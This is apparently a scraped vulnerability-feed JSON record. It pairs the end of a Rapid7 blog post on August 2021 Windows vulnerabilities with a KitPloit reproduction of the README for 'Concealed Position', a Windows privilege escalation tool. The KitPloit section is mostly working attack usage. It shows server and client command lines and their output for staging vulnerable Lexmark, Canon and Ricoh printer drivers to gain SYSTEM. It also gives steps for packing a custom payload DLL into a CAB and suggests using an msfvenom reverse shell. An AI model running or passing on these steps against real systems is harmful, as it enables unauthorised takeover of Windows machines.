[CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>), the August 2021 Patch Tuesday security update blocks the affected API calls [OpenEncryptedFileRawA](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>) and [OpenEncryptedFileRawW](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfileraww>) through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take additional steps listed in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) to ensure their systems are fully mitigated.\n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to the vulnerabilities in this post with authenticated vulnerability checks. Please note that details haven\u2019t yet been released on CVE-2021-38085 and CVE-2021-36958; therefore, it\u2019s still awaiting analysis and check development.\n\n### Updates\n\n**Pulse Connect Secure CVE-2021-22937** \nOn August 24, 2021, the Cybersecurity & Infrastructure Security Agency (CISA) released [Malware Analysis Report (AR21-236E)](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>) which includes indicators of compromise (IOCs) to assist with Pulse Connect Secure investigations.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T17:13:25", "type": "rapid7blog", "title": "Popular Attack Surfaces, August 2021: What You Need to Know", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2020-17001", "CVE-2020-17014", "CVE-2020-8260", "CVE-2021-1675", "CVE-2021-1722", "CVE-2021-22937", "CVE-2021-24077", "CVE-2021-24088", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35449", "CVE-2021-36942", "CVE-2021-36958", "CVE-2021-38085"], "modified": "2021-08-12T17:13:25", "id": "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "href": "https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2022-04-07T12:01:39", "description": "[](<https://1.bp.blogspot.com/-JMl-654CheQ/YUOLZnQfumI/AAAAAAAAuuQ/JGDFkb4V1iQ5GvRUodx6ZDEecD6q2iZ1gCNcBGAsYHQ/s300/printer_hack.jpeg>)\n\n \n\n\nConcealed Position is a local [privilege escalation](<https://www.kitploit.com/search/label/Privilege%20Escalation> \"privilege escalation\" ) attack against Windows using the concept of \"Bring Your Own Vulnerability\". Specifically, Concealed Position (CP) uses the _as designed_ package point and print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with [known vulnerabilities](<https://www.kitploit.com/search/label/Known%20Vulnerabilities> \"known vulnerabilities\" ) which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29.\n\n \n\n\n**What exploits are available** \n\n\nConcealed Position offers four exploits - all with equally dumb names:\n\n * ACIDDAMAGE - [CVE-2021-35449](<https://nvd.nist.gov/vuln/detail/CVE-2021-35449> \"CVE-2021-35449\" ) \\- Lexmark Universal Print Driver LPE\n * RADIANTDAMAGE - [CVE-2021-38085](<https://nvd.nist.gov/vuln/detail/CVE-2021-38085> \"CVE-2021-38085\" ) \\- Canon TR150 Print Driver LPE\n * POISONDAMAGE - [CVE-2019-19363](<https://nvd.nist.gov/vuln/detail/CVE-2019-19363> \"CVE-2019-19363\" ) \\- Ricoh PCL6 Print Driver LPE\n * SLASHINGDAMAGE - [CVE-2020-1300](<https://nvd.nist.gov/vuln/detail/CVE-2020-1300> \"CVE-2020-1300\" ) \\- Windows Print Spooler LPE\n\nThe exploits are neat because, besides SLASHINGDAMAGE, they will continue working even after the issues are patched. The only mechanism Windows has to stop users from using old drivers is to revoke the driver's certificate - something that is not(?) historically done.\n\n \n**But which exploit should I use?!** \n\n\nProbably ACIDDAMAGE. RADIANTDAMAGE and POISONDAMAGE are race conditions (to overwrite a DLL) and SLASHINGDAMAGE damage, hopefully, is patched most everywhere.\n\n \n**How does it work?** \n\n\nConcealed Position has two parts. An evil printer and a client. The client reaches out to the server, grabs a driver, gets the driver stored in the driver store, installs the printer, and exploits the install process. Easy! In MSAPI speak, the attack goes something like this:\n \n \n Step 1: Stage the driver in the driver store \n client to server: GetPrinterDriver \n server to client: Response with driver \n \n Stage 2: Install the driver from the driver store \n client: InstallPrinterDriverFromPackage \n \n Stage 3: Add a local printer (exploitation stage) \n client: Add printer \n \n\nIt is important to note that SLASHINGDAMAGE doesn't actually work like that though. SLASHINGDAMAGE is an implementation of the evil printer attack described at DEFCON 28 (2020) and has long since been patched. I just so happen to enjoy the attack (it sparked the rest of this development) and figured I'd leave the exploit in my evil server... as confusing as that may be.\n\n \n**Is this a Windows vulnerability?** \n\n\nArguably, yes. The driver store is a [\"trusted collection of ... third-party driver packages\"](<https://docs.microsoft.com/en-us/windows-hardware/drivers/install/driver-store> \"trusted collection of ... third-party driver packages\" ) that requires administrator access to modify. Using `GetPrinterDriver` a low privileged attacker can stage arbitrary drivers into the store. This, to me, crosses a clear security boundary.\n\nMicrosoft seemed to agree when they issued [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481> \"CVE-2021-34481\" ).\n\nAlthough... it's arguable that this is simply a feature of the system and not a [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) at all. It really doesn't matter all that much. An attacker can escalate to SYSTEM on standard Windows installs.\n\n \n**Which verions of Windows are affected by CVE-2021-34481?** \n\n\nAt least Windows 8.1 and above.\n\n \n**How do I use these tools?** \n\n\nSimple! So simple there will be many paragraphs to describe it!\n\n \n**CP Server** \n\n\nFirst, let's look at cp_server's command line options:\n \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin>cp_server.exe \n _______ _______ __ _ _______ _______ _______ ___ _______ ______ \n | || || | | || || || _ || | | || | \n | || _ || |_| || || ___|| |_| || | | ___|| _ | \n | || | | || || || |___ | || | | |___ | | | | \n | _|| |_| || _ || _|| ___|| || |___ | ___|| |_| | \n | |_ | || | | || |_ | |___ | _ || || |___ | | \n |_______||_______||_| |__||_______||_______||__| |__||_______||_______||______| \n _______ _______ _______ ___ _______ ___ _______ __ _ \n | || || || | | || | | || | | | \n | _ || _ || _____|| | |_ _|| | | _ || |_| | \n | |_| || | | || |_____ | | | | | | | | | || | \n | ___|| |_| || _____ || | | | | | | |_| || _ | \n | | | | _____| || | | | | | | || | | | \n |___| |_______||_______||___| |___| |___| |_______||_| |__| server! \n \n CLI options: \n -h, --help Display the help message \n -e, --exploit arg The exploit to use \n -c, --cabs arg (=.\\cab_files) The location of the cabinet files \n \n Exploits available: \n ACIDDAMAGE \n POISONDAMAGE \n RADIANTDAMAGE \n SLASHINGDAMAGE \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin> \n \n\nAbove you can see the server requires two options:\n\n 1. The exploit to configure the printer for\n 2. A path to this repositories cab_files (.\\cab_files\\ is the default)\n\nFor example, let's say we wanted to configure an evil printer that would serve up the ACIDDAMAGE driver. Just do this:\n \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin>cp_server.exe -e ACIDDAMAGE \n _______ _______ __ _ _______ _______ _______ ___ _______ ______ \n | || || | | || || || _ || | | || | \n | || _ || |_| || || ___|| |_| || | | ___|| _ | \n | || | | || || || |___ | || | | |___ | | | | \n | _|| |_| || _ || _|| ___|| || |___ | ___|| |_| | \n | |_ | || | | || |_ | |___ | _ || || |___ | | \n |_______||_______||_| |__||_______||_______||__| |__||_______||_______||______| \n _______ _______ _______ ___ _______ ___ _______ __ _ \n | || || || | | || | | || | | | \n | _ || _ || _____|| | |_ _|| | | _ || |_| | \n | |_| || | | || |_____ | | | | | | | | | || | \n | ___|| |_| ||_____ || | | | | | | |_| || _ | \n | | | | _____| || | | | | | | || | | | \n |___| |_______||_______||___| |___| |___| |_______||_| |__| server! \n \n [+] Creating temporary space... \n [+] Expanding .\\cab_files\\ACIDDAMAGE\\LMUD1o40.cab \n [+] Pushing into the driver store \n [+] Cleaning up tmp space \n [+] Installing print driver \n [+] Driver installed! \n [+] Installing shared printer \n [+] Shared printer installed! \n [+] Automation Done. \n [!] IMPORTANT MANUAL STEPS! \n [0] In Advanced Sharing Settings, Turn off password protected sharing. \n [1] Ready to go! \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin> \n \n\nAnd that's it, you'll see a new printer on your system:\n \n \n PS C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin> Get-Printer \n \n Name ComputerName Type DriverName PortName Shared Publishe \n d \n ---- ------------ ---- ---------- -------- ------ -------- \n ACIDDAMAGE Local Lexmark Universal v2 LPT1: True False \n CutePDF Writer Local CutePDF Writer v4.0 CPW4: False False \n OneNote for Windows 10 Local Microsoft Software Pri... Microsoft.Of... False False \n Microsoft XPS Document Writer Local Microsoft XPS Document... PORTPROMPT: False False \n Microsoft Print to PDF Local Microsoft Print To PDF PORTPROMPT: False False \n Fax Local Microsoft Shared Fax D... SHRFAX: False False \n \n \n PS C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin> \n \n\nNote that there is one manual step that `cp_server` prompts you to do. Because I'm a junk hacker, I couldn't figure out how to programmatically set the \"Advanced Sharing Settings\" -> \"Turn off password protected sharing\". You'll have to do that yourself!\n\nThe process for using `SLASHINGDAMAGE` is a little different. You'll need to first install CutePDF Writer (find the installers in the 3rd party directory). Then run cp_server and _then_ you'll still need to follow a couple of manual steps and reboot.\n\n \n**CP Client** \n\n\nThe client is similarly easy to use. Let's look at it's command line options:\n \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin>cp_client.exe \n _______ _______ __ _ _______ _______ _______ ___ _______ ______ \n | || || | | || || || _ || | | || | \n | || _ || |_| || || ___|| |_| || | | ___|| _ | \n | || | | || || || |___ | || | | |___ | | | | \n | _|| |_| || _ || _|| ___|| || |___ | ___|| |_| | \n | |_ | || | | || |_ | |___ | _ || || |___ | | \n |_______||_______||_| |__||_______||_______||__| |__||_______||_______||______| \n _______ _______ _______ ___ _______ ___ _______ __ _ \n | || || || | | || | | || | | | \n | _ || _ || _____|| | |_ _|| | | _ || |_| | \n | |_| || | | || |_____ | | | | | | | | | || | \n | ___|| |_| || _____ || | | | | | | |_| || _ | \n | | | | _____| || | | | | | | || | | | \n |___| |_______||_______||___| |___| |___| |_______||_| |__| client! \n \n CLI options: \n -h, --help Display the help message \n -r, --rhost arg The remote evil printer address \n -n, --name arg The remote evil printer name \n -e, --exploit arg The exploit to use \n -l, --local No remote printer. Local attack only. \n -d, --dll arg Path to user provided DLL to execute. \n \n Exploits available: \n ACIDDAMAGE \n POISONDAMAGE \n RADIANTDAMAGE \n \n\nFirst, I'd like to address the --dll option. The client has an embedded payload that will simply write the C:\\result.txt file. However, users can provide their own DLL via this option. A good example of something you might want to use is an x64 reverse shell produced by msfvenom. But for the rest of this we'll just assume the embedded payload.\n\n`cp_client` has two modes: remote and local. The remote option is the most interesting because it adds the [vulnerable driver](<https://www.kitploit.com/search/label/Vulnerable%20Driver> \"vulnerable driver\" ) to the driver store (thus executing the bring your own print driver vulnerability), so we'll go with that first. Let's say I want to connect back to the evil ACIDDAMAGE printer we configured previously. I just need to provide:\n\n 1. The exploit I want to use\n 2. The evil printer IP address\n 3. The name of the evil shared printer\n\nLike this!\n \n \n C:\\Users\\albinolobster\\Desktop>cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE \n _______ _______ __ _ _______ _______ _______ ___ _______ ______ \n | || || | | || || || _ || | | || | \n | || _ || |_| || || ___|| |_| || | | ___|| _ | \n | || | | || || || |___ | || | | |___ | | | | \n | _|| |_| || _ || _|| ___|| || |___ | ___|| |_| | \n | |_ | || | | || |_ | |___ | _ || || |___ | | \n |_______||_______||_| |__||_______||_______||__| |__||_______||_______||______| \n _______ _______ _______ ___ _______ ___ _______ __ _ \n | || || || | | || | | || | | | \n | _ || _ || _____|| | |_ _|| | | _ || |_| | \n | |_| || | | || |_____ | | | | | | | | | || | \n | ___|| |_ | ||_____ || | | | | | | |_| || _ | \n | | | | _____| || | | | | | | || | | | \n |___| |_______||_______||___| |___| |___| |_______||_| |__| client! \n \n [+] Checking if driver is already installed \n [-] Driver is not available. \n [+] Call back to evil printer @ \\\\10.0.0.9\\ACIDDAMAGE \n [+] Staging driver in driver store \n [+] Installing the staged driver \n [+] Driver installed! \n [+] Starting AcidDamage \n [+] Checking if C:\\ProgramData\\Lexmark Universal v2\\ exists \n [-] Target directory doesn't exist. Trigger install. \n [+] Installing printer \n [+] Read in C:\\ProgramData\\Lexmark Universal v2\\Universal Color Laser.gdl \n [+] Searching file contents \n [+] Updating file contents \n [+] Dropping updated gpl \n [+] Dropping Dll.dll to disk \n [+] Staging dll in c:\\tmp \n [+] Installing printer \n [!] Mucho success! \n \n\nThat's it! To execute a local only attack, you just need to provide the exploit:\n \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin>cp_client.exe -l -e ACIDDAMAGE \n _______ _______ __ _ _______ _______ _______ ___ _______ ______ \n | || || | | || || || _ || | | || | \n | || _ || |_| || || ___|| |_| || | | ___|| _ | \n | || | | || || || |___ | || | | |___ | | | | \n | _|| |_| || _ || _|| ___|| || |___ | ___|| |_| | \n | |_ | || | | || |_ | |___ | _ || || |___ | | \n |_______||_______||_| |__||_______||_______||__| |__||_______||_______||______| \n _______ _______ _______ ___ _______ ___ _______ __ _ \n | || || || | | || | | || | | | \n | _ || _ || _____|| | |_ _|| | | _ || |_| | \n | |_| || | | || |_____ | | | | | | | | | || | \n | ___|| |_| ||_____ || | | | | | | |_| || _ | \n | | | | _____| || | | | | | | || | | | \n |___| |_______||_______||___| |___| |___| |_______||_| |__| client! \n \n [+] Checking if driver is already installed \n [+] Driver installed! \n [+] Starting AcidDamage \n [+] Checking if C:\\ProgramData\\Lexmark Universal v2\\ exists \n [-] Target directory doesn't exist. Trigger install. \n [+] Installing printer \n [+] Read in C:\\ProgramData\\Lexmark Universal v2\\Universal Color Laser.gdl \n [+] Searching file contents \n [+] Updating file contents \n [+] Dropping updated gpl \n [+] Dropping Dll.dll to disk \n [+] Staging dll in c:\\tmp \n [+] Installing printer \n [!] Mucho success! \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin> \n \n\n \n**Why doesn't the client have a SLASHINGDAMAGE option?** \n\n\n`SLASHINGDAMAGE` doesn't need a special client for exploitation. You can just use the UI or the command line to connect to the remote printer and that's it! Unfortunately, if you want to roll a custom payload you'll need to update the CAB in the cab_files directory. But that's easy. Something like this:\n \n \n echo \u201cevil.dll\u201d \u201c../../evil.dll\u201d > files.txt \n makecab /f files.txt \n move disk1/1.cab exploit.cab \n \n\nIt's probably important to know that the version of `SLASHINGDAMAGE` in the repo drops ualapi.dll into SYSTEM32 and, when executed on reboot, it drops the C:\\result.txt file.\n\n \n**Pull Requests and Bugs** \n\n\nDo you want to submit a pull request or file a bug? Great! I appreciate that, but if you don't provide sufficient details to reproduce a bug or explain why a pull request should be accepted then there is a 100% chance I'll close your issue without comment. I appreciate you, but I'm also pretty busy.\n\n \n**Other things** \n\n\nOne thing to note is that the inject_me dll is actually embedded in the cp_client as a C array. If you update inject_me, you'll need to manually update the C array as well (just use xxd to generate the array).\n\n \n \n\n\n**[Download Concealed_Position](<https://github.com/jacob-baines/concealed_position> \"Download Concealed_Position\" )**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-18T11:30:00", "type": "kitploit", "title": "Concealed Position - Bring Your Own Print Driver Privilege Escalation Tool", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19363", "CVE-2020-1300", "CVE-2021-34481", "CVE-2021-35449", "CVE-2021-38085"], "modified": "2021-09-18T11:30:00", "id": "KITPLOIT:1358590931647264988", "href": "http://www.kitploit.com/2021/09/concealed-position-bring-your-own-print.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
CVE-2021-38085
